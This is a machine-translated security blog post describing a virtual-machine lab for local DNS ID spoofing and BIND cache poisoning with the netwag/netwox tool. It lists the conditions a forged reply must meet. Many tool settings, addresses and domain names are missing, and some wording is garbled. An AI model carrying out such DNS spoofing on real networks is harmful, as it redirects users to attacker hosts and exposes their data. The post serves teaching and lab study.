principle and example of local dns attack

Posted by millikan at 2020-02-29

The author of this article: fi nation end, this article plus the previous article "TCP session hijacking principle and test", completed two articles with a total reward of 20 yuan and invited to join the knowledge planet for free.

DNS is the abbreviation of computer domain name system (domain name system or domain name service). It is composed of domain name resolver and domain name server.

In short, when users apply to access a domain name, they will first send a request package to the DNS server to ask the IP address of the domain name, that is, the process of DNS resolution. The DNS cache contains a series of cached domain names and corresponding IP addresses. When the domain name accessed by the client is cached in the cache, the corresponding IP address of the domain name is returned directly. If it is not cached, the server sends a query request to other DNS servers closest to it.

It can be seen from the above that the key of DNS attack is to forge an IP address and return it to the user. We can attack the local DNS from two aspects.

(1) After listening to the DNS resolution request sent by the user, the packet containing forged IP address will be sent to the user before the DNS returns the IP address

(2) Use DNS to check the vulnerability of local cache first every time, and modify the corresponding IP of the specified domain name in the cache.

Here are three virtual machines for demonstration

Virtual machine configuration:

Ubuntu DNS server: (Baidu can install BIND9 by yourself)

Ubuntu client:

Ubuntu attacker:

Attack tools:


Configuration before experiment:

Make the following configuration on the client:

sudo vim /etc/resolv.conf

Add a line:


The following modifications are made in the network configuration to bind the DNS server to ensure the smooth operation of the experiment

Practical drill

DNS ID spoofing using sniffer

When the attacker and the victim are in the same local LAN, when a user types a web address in a web browser, such as, the user's machine will send a DNS request to the DNS server to resolve the IP address of the host name. When the supervisor hears the DNS request, the attacker will fabricate a fake DNS response. A fake DNS response will be accepted by the user if it meets the following criteria:

1. The source IP address must match the IP address that the DNS request was sent to

2. The destination IP address must match the IP address sent by the DNS request;

3. The source port number (UDP port) must match the port number where DNS requests are delivered (usually port 53);

4. The destination port number must match the port number sent by the DNS request;

5. The calculation of UDP checksums must be correct;

6. The transport ID must match the transport ID of DNS;

7. The domain name of the reply part must match the domain name of the request part;

8. The domain name of the reply part must match the domain name of the DNS request query part;

9. The user's computer must receive the attacker's DNS response before receiving a legitimate DNS response.

If the conditions of 1 to 8 are met, the attacker can sniff the DNS request information sent by the victim, and then create a fake DNS response, which will be sent to the victim before the real DNS server responds. The netwag tool 105 tool provides the application of sniffing and response. First, input netwag to open the tool under the terminal, and then configure as follows:

This operation will send as the domain name of

This operation specifies the IP address of the attack host:

After the configuration is successful, click the "run" button in the lower right corner to listen to the packets sent by the victim's machine to its DNS server and send its own forged DNS packets, so that after a short period of time, the forged packets can be generated


It is found that the original IP address of this website has been changed to the forged IP address of the attacker, indicating that DNS spoofing succeeded.

Open and find that the original IP address of this website has changed to the forged IP address of the attacker, indicating that DNS spoofing is successful.

On the user's computer


Indicates that IP redirection is successful

DNS cache poisoning attack

Remote login to DNS server

After obtaining root permission, enter the following command to clear the cache:

# sudo rndc flush

# sudo rndc dumpdb -cache

# sudo cat /var/cache/bind/dump.db

Change the IP value to the IP address of the destination DNS server in netwox, and change the mode to raw

When the user sends the domain name resolution request of, the DNS server fails to query the local cahce, and sends the resolution request to the server. At this time, the attacker can sniff the request packet and construct a fake packet to send to the DNS server.

On the user's computer:


Indicates that the attack is successful


For DNS attack, once the attack is successful, it will cause huge damage to the user's information and property security. Using IP directly to access important services can effectively prevent DNS attack, but it brings great inconvenience.

In this experiment, a simple DNS attack is carried out under the condition that the local area network can be monitored. Only a simple tool is needed for the attacker to achieve a huge effect, which shows that the security of the local area network is extremely important.

So for the host in the remote network, whether DNS attacks can be carried out or not, the answer is naturally yes, but first of all, we need to have a deep understanding of the contents of the DNS return package. Please pay attention to the following remote DNS attack examples. ^ ^